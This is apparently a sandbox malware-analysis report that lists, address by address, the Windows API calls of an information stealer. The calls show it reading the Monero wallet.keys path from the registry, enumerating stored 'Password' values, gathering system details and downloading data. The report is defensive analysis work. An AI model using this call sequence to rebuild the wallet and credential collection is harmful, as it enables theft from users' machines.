                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(00000000,02F63390,00000000,00020019,00000000,0041D289), ref: 00414B41
                                                                                                                                                                                                                              • RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00414BC3
                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 00414BF6
                                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00414C18
                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00414C29
                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00414C36
                                                                                                                                                                                                                                • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseOpenlstrcpy$Enumwsprintf
                                                                                                                                                                                                                              • String ID: - $%s\%s$?
                                                                                                                                                                                                                              • API String ID: 3246050789-3278919252
                                                                                                                                                                                                                              • Opcode ID: b8111693fa62a267de5ebd841b34ea72a3f35e1b955037dfc24ed0bdb14de6f5
                                                                                                                                                                                                                              • Instruction ID: fbc8112ab3bfbfb2fdc98052a2813d45c496b4d84dbcb1503bfdf8522ef193f5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b8111693fa62a267de5ebd841b34ea72a3f35e1b955037dfc24ed0bdb14de6f5
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F1712A7590021C9BDB64DB60DD91FDA77B9BF88304F0086D9A109A6180DF74AFCACF94
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • strtok_s.MSVCRT ref: 0040F667
                                                                                                                                                                                                                              • strtok_s.MSVCRT ref: 0040FA8F
                                                                                                                                                                                                                                • Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,02F60C98,?,0041D8AC,?,00000000), ref: 00416E2B
                                                                                                                                                                                                                                • Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: strtok_s$lstrcpylstrlen
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 348468850-0
                                                                                                                                                                                                                              • Opcode ID: 9f1b4f11eae13c0db4981184c1b5932fc42dca235854517f4c2e1cf032e699fe
                                                                                                                                                                                                                              • Instruction ID: 2b3dd8003c7db60ae6f20250f168b485c10b0cdbdb2f80ad8031a0e3e82ebbeb
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9f1b4f11eae13c0db4981184c1b5932fc42dca235854517f4c2e1cf032e699fe
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B4C1A7B5900619DBCB24EF60DC89FDA7779AF58304F00459EE40DA7191DB34AAC9CFA8
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • memset.MSVCRT ref: 004012E7
                                                                                                                                                                                                                                • Part of subcall function 00401260: GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 00401274
                                                                                                                                                                                                                                • Part of subcall function 00401260: HeapAlloc.KERNEL32(00000000), ref: 0040127B
                                                                                                                                                                                                                                • Part of subcall function 00401260: RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 00401297
                                                                                                                                                                                                                                • Part of subcall function 00401260: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012B5
                                                                                                                                                                                                                                • Part of subcall function 00401260: RegCloseKey.ADVAPI32(?), ref: 004012BF
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040130F
                                                                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 0040131C
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,.keys), ref: 00401337
                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                • Part of subcall function 00415260: GetSystemTime.KERNEL32(?,02F41CF8,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286
                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                              • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00401425
                                                                                                                                                                                                                                • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                • Part of subcall function 004093A0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
                                                                                                                                                                                                                                • Part of subcall function 004093A0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
                                                                                                                                                                                                                                • Part of subcall function 004093A0: LocalAlloc.KERNEL32(00000040,?), ref: 00409411
                                                                                                                                                                                                                                • Part of subcall function 004093A0: ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
                                                                                                                                                                                                                                • Part of subcall function 004093A0: LocalFree.KERNEL32('@), ref: 00409470
                                                                                                                                                                                                                                • Part of subcall function 004093A0: FindCloseChangeNotification.KERNEL32(000000FF), ref: 0040947A
                                                                                                                                                                                                                              • DeleteFileA.KERNEL32(00000000), ref: 004014A9
                                                                                                                                                                                                                              • memset.MSVCRT ref: 004014D0
                                                                                                                                                                                                                                • Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
                                                                                                                                                                                                                                • Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
                                                                                                                                                                                                                                • Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,02F61B90), ref: 00404ED9
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Filelstrcpy$lstrcat$lstrlen$AllocCloseHeapLocalOpenmemset$ChangeCopyCreateDeleteFindFreeInternetNotificationProcessQueryReadSizeSystemTimeValue
                                                                                                                                                                                                                              • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                                                                                                                                                                                                              • API String ID: 2054947926-218353709
                                                                                                                                                                                                                              • Opcode ID: 829d047be8548394cdd0d92b89e8218dfaef052577727897bd9fcb70cd4860d9
                                                                                                                                                                                                                              • Instruction ID: 465d6e3be360dc7981781b6de12631b9db2cd28431e3bfe2701297f35846b4c8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 829d047be8548394cdd0d92b89e8218dfaef052577727897bd9fcb70cd4860d9
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DD5123B195021897CB15EB61DD92BED773D9F54304F4041EDB60A62091DE385BC5CFA8
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00406CA0: memset.MSVCRT ref: 00406CE4
                                                                                                                                                                                                                                • Part of subcall function 00406CA0: RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?), ref: 00406D0A
                                                                                                                                                                                                                                • Part of subcall function 00406CA0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00406D81
                                                                                                                                                                                                                                • Part of subcall function 00406CA0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00406DDD
                                                                                                                                                                                                                                • Part of subcall function 00406CA0: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406E22
                                                                                                                                                                                                                                • Part of subcall function 00406CA0: HeapFree.KERNEL32(00000000,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406E29
                                                                                                                                                                                                                              • lstrcat.KERNEL32(2F6A5020,0041DEB8), ref: 00406FD6
                                                                                                                                                                                                                              • lstrcat.KERNEL32(2F6A5020,00000000), ref: 00407018
                                                                                                                                                                                                                              • lstrcat.KERNEL32(2F6A5020, : ), ref: 0040702A
                                                                                                                                                                                                                              • lstrcat.KERNEL32(2F6A5020,00000000), ref: 0040705F
                                                                                                                                                                                                                              • lstrcat.KERNEL32(2F6A5020,0041DEC0), ref: 00407070
                                                                                                                                                                                                                              • lstrcat.KERNEL32(2F6A5020,00000000), ref: 004070A3
                                                                                                                                                                                                                              • lstrcat.KERNEL32(2F6A5020,0041DEC4), ref: 004070BD
                                                                                                                                                                                                                              • task.LIBCPMTD ref: 004070CB
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                                                                                                                                                                                                                              • String ID: : $`v@$h0A
                                                                                                                                                                                                                              • API String ID: 3191641157-3559972273
                                                                                                                                                                                                                              • Opcode ID: fad620bb43c95ac72e570f87520ac694cccd13f49ee7692c54244a2421b88b9f
                                                                                                                                                                                                                              • Instruction ID: d9fe8ddf8edd41d5d79e2c2aa3549d60ad86c8a123fe42dd1537da3b5299582f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fad620bb43c95ac72e570f87520ac694cccd13f49ee7692c54244a2421b88b9f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4B318371E05504ABCB14EBA0DD99EFF7B75BF44305B104519F102BB290DA38BD46CB99
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: image/jpeg
                                                                                                                                                                                                                              • API String ID: 0-3785015651
                                                                                                                                                                                                                              • Opcode ID: df4b5375de85740f6df385f3b25298f6dd913adec2cf3b48f6988f7d2f499267
                                                                                                                                                                                                                              • Instruction ID: 4e1e11a2c406ea1305e74ab4ef0d66e5904d243d4ada77d8c1e4b1ca7303bf9d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: df4b5375de85740f6df385f3b25298f6dd913adec2cf3b48f6988f7d2f499267
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 30714CB5910608EBDB14EFE4EC85FEEB7B9BF48300F108509F515A7290DB38A945CB64
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00404C8A
                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 00404C91
                                                                                                                                                                                                                              • InternetOpenA.WININET(0041D79B,00000000,00000000,00000000,00000000), ref: 00404CAA
                                                                                                                                                                                                                              • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00404CD1
                                                                                                                                                                                                                              • InternetReadFile.WININET(c.A,?,00000400,00000000), ref: 00404D01
                                                                                                                                                                                                                              • InternetCloseHandle.WININET(c.A), ref: 00404D75
                                                                                                                                                                                                                              • InternetCloseHandle.WININET(?), ref: 00404D82
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                                                                                                                                                                                                              • String ID: c.A$c.A
                                                                                                                                                                                                                              • API String ID: 3066467675-270182787
                                                                                                                                                                                                                              • Opcode ID: ca588432d9c45ec4d266bad531f4ca137aab267bd9607120867c66fabd43db69
                                                                                                                                                                                                                              • Instruction ID: 93472a029acc8278824907ab7d145ea178407da7df790c597300061c638fc298
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ca588432d9c45ec4d266bad531f4ca137aab267bd9607120867c66fabd43db69
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3731F8F4A00218ABDB20DF54DD85BDDB7B5BB88304F5081D9F709A7280DB746AC58F98
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • memset.MSVCRT ref: 00406CE4
                                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?), ref: 00406D0A
                                                                                                                                                                                                                              • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00406D81
                                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00406DDD
                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406E22
                                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406E29
                                                                                                                                                                                                                                • Part of subcall function 00408C20: vsprintf_s.MSVCRT ref: 00408C3B
                                                                                                                                                                                                                              • task.LIBCPMTD ref: 00406F25
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Heap$EnumFreeOpenProcessValuememsettaskvsprintf_s
                                                                                                                                                                                                                              • String ID: Password
                                                                                                                                                                                                                              • API String ID: 2698061284-3434357891
                                                                                                                                                                                                                              • Opcode ID: e5b433d59e683e3853dabaec4553a197e9f76ed1b5df22dde85a26ca8bf12c56
                                                                                                                                                                                                                              • Instruction ID: 212e66a44237aadac39c144ffd634e87161c2b2b5cb707631054264fe3c499ea
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e5b433d59e683e3853dabaec4553a197e9f76ed1b5df22dde85a26ca8bf12c56
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4F613FB5D042589BDB24DB50CC45BDAB7B8BF44304F0081EAE64AA6281DF746FC9CF95
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 004141DF
                                                                                                                                                                                                                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041421C
                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004142A0
                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 004142A7
                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 004142DD
                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Heap$AllocDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                                                                                                                                                                                                              • String ID: :$C$\
                                                                                                                                                                                                                              • API String ID: 3790021787-3809124531
                                                                                                                                                                                                                              • Opcode ID: 0a1b2232d35ee7de4b6f28c15393aae813b3accf682f5c3251ca908f42bab15a
                                                                                                                                                                                                                              • Instruction ID: 52054a8b39965f6583c41ffabf349f0ba0ed2356e3a02770a6039194ee1378f4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0a1b2232d35ee7de4b6f28c15393aae813b3accf682f5c3251ca908f42bab15a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BA3194B0D00258EBDF20DFA4DC45BEE77B4AF48304F104099F5496B281DB78AAD5CB95
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
                                                                                                                                                                                                                              • GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,?), ref: 00409411
                                                                                                                                                                                                                              • ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
                                                                                                                                                                                                                              • LocalFree.KERNEL32('@), ref: 00409470
                                                                                                                                                                                                                              • FindCloseChangeNotification.KERNEL32(000000FF), ref: 0040947A
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: File$Local$AllocChangeCloseCreateFindFreeNotificationReadSize
                                                                                                                                                                                                                              • String ID: '@$'@
                                                                                                                                                                                                                              • API String ID: 1815715184-345573653
                                                                                                                                                                                                                              • Opcode ID: cf458a8a353809de38654f8e72a6455ab1764ae5e341fa98badb5250dcb4c73b
                                                                                                                                                                                                                              • Instruction ID: e17ca2bf8fb39da35cf654cfb04ed30359ebe63801e33f8f777122e55a65d6c5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cf458a8a353809de38654f8e72a6455ab1764ae5e341fa98badb5250dcb4c73b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0B31EA74A00209EFDB24DF94C885BAEB7B5BF48314F108169E915A73D0D778AD42CFA5
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,00000000,?,02F65518,00000000,?,0041D774,00000000,?,00000000,00000000,?,02F65560), ref: 0041496D
                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00414974
                                                                                                                                                                                                                              • GlobalMemoryStatusEx.KERNEL32(00000040), ref: 00414995
                                                                                                                                                                                                                              • __aulldiv.LIBCMT ref: 004149AF
                                                                                                                                                                                                                              • __aulldiv.LIBCMT ref: 004149BD
                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 004149E9
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Heap__aulldiv$AllocGlobalMemoryProcessStatuswsprintf
                                                                                                                                                                                                                              • String ID: %d MB$@
                                                                                                                                                                                                                              • API String ID: 2886426298-3474575989
                                                                                                                                                                                                                              • Opcode ID: f62cb7ad2578be9c21b89e6e1bf921e4f1007482674ad6998ac9b57a816d1492
                                                                                                                                                                                                                              • Instruction ID: f510475f390b20142bb5ad9b480526056b42ea6839ab7368ec165d8bd78ed5c1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f62cb7ad2578be9c21b89e6e1bf921e4f1007482674ad6998ac9b57a816d1492
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 84111EB0D40208ABDB10DFE4CC49FAE77B8BB48704F104549F715BB284D7B8A9418B99
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                • Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
                                                                                                                                                                                                                                • Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506
                                                                                                                                                                                                                              • InternetOpenA.WININET(0041D7D3,00000001,00000000,00000000,00000000), ref: 00405DAF
                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,02F61B90), ref: 00405DE7
                                                                                                                                                                                                                              • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00405E2F
                                                                                                                                                                                                                              • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00405E53
                                                                                                                                                                                                                              • InternetReadFile.WININET(00410E73,?,00000400,?), ref: 00405E7C
                                                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00405EAA
